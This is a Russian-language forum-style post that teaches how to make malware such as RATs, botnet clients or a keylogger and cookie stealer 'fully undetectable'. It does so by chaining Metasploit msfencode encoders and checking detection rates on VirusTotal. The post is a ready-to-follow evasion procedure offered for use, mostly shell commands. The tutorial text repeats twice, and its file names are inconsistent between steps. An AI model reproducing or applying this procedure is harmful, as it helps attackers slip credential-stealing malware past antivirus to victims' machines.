Долго искал, как закриптовать вирус, наконец попалась эта инфа. В принципе с самописным кейлогер+кукистиллер сработало. Изначально показатель на VT был 17, после данных процедур - 0.
Я использовал Backtrack. На счет Kali - не знаю, но думаю данная утилита должна быть.
Что нам необходимо:
1. Backtrack OS
2. MSF encoders
Итак, наш первый шаг - создать вирусный файл с помощью любого из таких инструментов, как RAT, бот-нет, или что-то еще. Чтобы сделать это FUD (Fully Undetectable), мы используем backtrack. Прежде чем отправляться в FUD, проверьте файл на virustotal.com, и мы получим коэффициент обнаружения, например, скажем, 30/44
Теперь запустите терминал в Backtrack и перейдите в каталог, в котором находится ваш файл.
E.g. cd Desktop
Итак, наш первый шаг - изменить разрешения этого файла (775), введя эту команду: root@bt:~/Desktop# chmod 775 stub.exe
Далее введите эту команду для кодирования вашего вируса:
root@bt:~/Desktop# msfencode -i /root/Desktop/Server.exe -t raw -o /root/Desktop/stub2.exe -e x86/shikata_ga_nai -c 10
Вы заметите, что Антивирус все еще обнаружил это, хотя мы закодировали его 10 раз с “x86/shikata_ga_nai” encoder. Теперь снова измените разрешения этого выходного файла:
root@bt:~/Desktop# chmod 775 server2.exe
Теперь, 2-й раз, мы используем другой кодировщик с именем «jmp_call_additive»
root@bt:~/Desktop# msfencode -i /root/Desktop/Server2.exe -t raw -o /root/Desktop/Server3.exe -e x86/jmp_call_additive -c 1
Снова измените разрешения этого выходного файла:
root@bt:~/Desktop# chmod 775 server3.exe
Далее мы используем другой кодировщик “call4_dword_xor”:
root@bt:~/Desktop# msfencode -i /root/Desktop/Server3.exe -t raw -o /root/Desktop/Server4.exe -e x86/call4_dword_xor -c 1
Теперь снова измените разрешения этого выходного файла:
root@bt:~/Desktop# chmod 775 server4.exe
Кодируем окончательно, используя “shikata_ga_nai” :
root@bt:~/Desktop# msfencode -i /root/Desktop/Server4.exe -o /root/Desktop/final.exe -e x86/shikata_ga_nai -c 1
Теперь снова измените разрешения этого выходного файла:
root@bt:~/Desktop# chmod 775 final.exe
Теперь вы получите файл final.exe, загрузите его на virustotal.com, и вы увидите результаты
Я использовал Backtrack. На счет Kali - не знаю, но думаю данная утилита должна быть.
Что нам необходимо:
1. Backtrack OS
2. MSF encoders
Итак, наш первый шаг - создать вирусный файл с помощью любого из таких инструментов, как RAT, бот-нет, или что-то еще. Чтобы сделать это FUD (Fully Undetectable), мы используем backtrack. Прежде чем отправляться в FUD, проверьте файл на virustotal.com, и мы получим коэффициент обнаружения, например, скажем, 30/44
Теперь запустите терминал в Backtrack и перейдите в каталог, в котором находится ваш файл.
E.g. cd Desktop
Итак, наш первый шаг - изменить разрешения этого файла (775), введя эту команду: root@bt:~/Desktop# chmod 775 stub.exe
Далее введите эту команду для кодирования вашего вируса:
root@bt:~/Desktop# msfencode -i /root/Desktop/Server.exe -t raw -o /root/Desktop/stub2.exe -e x86/shikata_ga_nai -c 10
Вы заметите, что Антивирус все еще обнаружил это, хотя мы закодировали его 10 раз с “x86/shikata_ga_nai” encoder. Теперь снова измените разрешения этого выходного файла:
root@bt:~/Desktop# chmod 775 server2.exe
Теперь, 2-й раз, мы используем другой кодировщик с именем «jmp_call_additive»
root@bt:~/Desktop# msfencode -i /root/Desktop/Server2.exe -t raw -o /root/Desktop/Server3.exe -e x86/jmp_call_additive -c 1
Снова измените разрешения этого выходного файла:
root@bt:~/Desktop# chmod 775 server3.exe
Далее мы используем другой кодировщик “call4_dword_xor”:
root@bt:~/Desktop# msfencode -i /root/Desktop/Server3.exe -t raw -o /root/Desktop/Server4.exe -e x86/call4_dword_xor -c 1
Теперь снова измените разрешения этого выходного файла:
root@bt:~/Desktop# chmod 775 server4.exe
Кодируем окончательно, используя “shikata_ga_nai” :
root@bt:~/Desktop# msfencode -i /root/Desktop/Server4.exe -o /root/Desktop/final.exe -e x86/shikata_ga_nai -c 1
Теперь снова измените разрешения этого выходного файла:
root@bt:~/Desktop# chmod 775 final.exe
Теперь вы получите файл final.exe, загрузите его на virustotal.com, и вы увидите результаты